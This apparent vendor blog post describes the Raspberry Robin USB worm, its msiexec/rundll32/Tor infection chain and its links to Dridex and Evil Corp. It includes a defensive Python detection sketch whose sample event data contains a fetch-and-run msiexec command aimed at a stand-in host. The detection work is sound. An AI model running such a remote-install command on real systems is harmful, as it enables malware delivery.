
Raspberry Robin: Worm that Spreads over External Storage Devices

Raspberry Robin (a.k.a. Worm.RaspberryRobin) started out as a low-profile threat that was often installed on external USB storage devices. It was first spotted in September 2021 and has since been found to be a launching point for more serious threats, as described in this Microsoft Security blog.

In the past 30 days, Raspberry Robin has triggered payload warnings on the devices of nearly 1,000 organizations. Post infection, it obtains its payload through msiexec.exe from QNAP cloud accounts, executes via rundll32.exe, and creates a command-and-control channel via Tor.
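A triage sketch for the msiexec.exe and rundll32.exe stages described above, added here as an example and not taken from A10 Networks, Microsoft or IBM. The event fields, host names, URL and five-minute correlation window are constructed assumptions; the Tor stage needs network telemetry and is left out.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (not real telemetry); field names are assumptions.
SYS = "C:\\Windows\\System32\\"
EVENTS = [
    {"ts": "2022-10-01T09:00:05", "host": "ws-01", "image": SYS + "msiexec.exe",
     "cmd": "msiexec /q /i http://nas.example.test:8080/a"},
    {"ts": "2022-10-01T09:00:40", "host": "ws-01", "image": SYS + "rundll32.exe",
     "cmd": r"rundll32 C:\Users\u\AppData\Local\Temp\x.dll,Start"},
    {"ts": "2022-10-01T09:05:00", "host": "ws-02", "image": SYS + "msiexec.exe",
     "cmd": r"msiexec /i C:\installers\app.msi"},        # local install: benign
    {"ts": "2022-10-01T09:05:30", "host": "ws-02", "image": SYS + "rundll32.exe",
     "cmd": "rundll32 shell32.dll,Control_RunDLL"},
    {"ts": "2022-10-01T11:00:00", "host": "ws-01", "image": SYS + "rundll32.exe",
     "cmd": "rundll32 shell32.dll,Control_RunDLL"},      # outside the window
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def remote_msiexec_url(event):
    """Return the URL when msiexec.exe is given a network source, else None."""
    if basename(event["image"]) != "msiexec.exe":
        return None
    match = URL_RE.search(event["cmd"])
    return match.group(0) if match else None

def correlate(events, window=timedelta(minutes=5)):
    """Flag remote msiexec installs and any rundll32 on the same host soon after."""
    findings, last_fetch = [], {}            # last_fetch: host -> time of remote msiexec
    for ev in sorted(events, key=lambda e: e["ts"]):
        when = datetime.fromisoformat(ev["ts"])
        url = remote_msiexec_url(ev)
        if url:
            last_fetch[ev["host"]] = when
            findings.append((ev["host"], "msiexec-remote-source", url))
        elif basename(ev["image"]) == "rundll32.exe" and ev["host"] in last_fetch:
            if when - last_fetch[ev["host"]] <= window:
                findings.append((ev["host"], "rundll32-after-fetch", ev["cmd"]))
    return findings

if __name__ == "__main__":
    for finding in correlate(EVENTS):
        print(finding)
```

Legitimate software deployment can also run msiexec.exe against a URL, so findings like these are leads to review against an allowlist of known installer sources rather than verdicts.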

Since Raspberry Robin and the Dridex malware loader share many traits, it can be linked to the Russian “Evil Corp” ransomware gang. In fact, IBM Security confirmed this while examining two dynamic link libraries (DLLs) dropped during a Raspberry Robin infection and comparing them to the Dridex malware loader affiliated with Evil Corp.

The U.S. Treasury sanctioned Evil Corp in 2019 for building Dridex. The decoding algorithms of Raspberry Robin and Dridex were found to be similar: both used arbitrary strings in the portable executables and had intermediate loader code that decoded the final payload in a similar way. Both also included similar anti-analysis code.

How A10 Networks Protects Against Malware and Raspberry Robin

Malware protection requires insight into encrypted traffic to stop attacks at the network edge. A10 Networks Thunder® SSL Insight (SSLi®) provides TLS/SSL decryption and inspection to spot malware and other exploits hidden in encrypted network traffic.
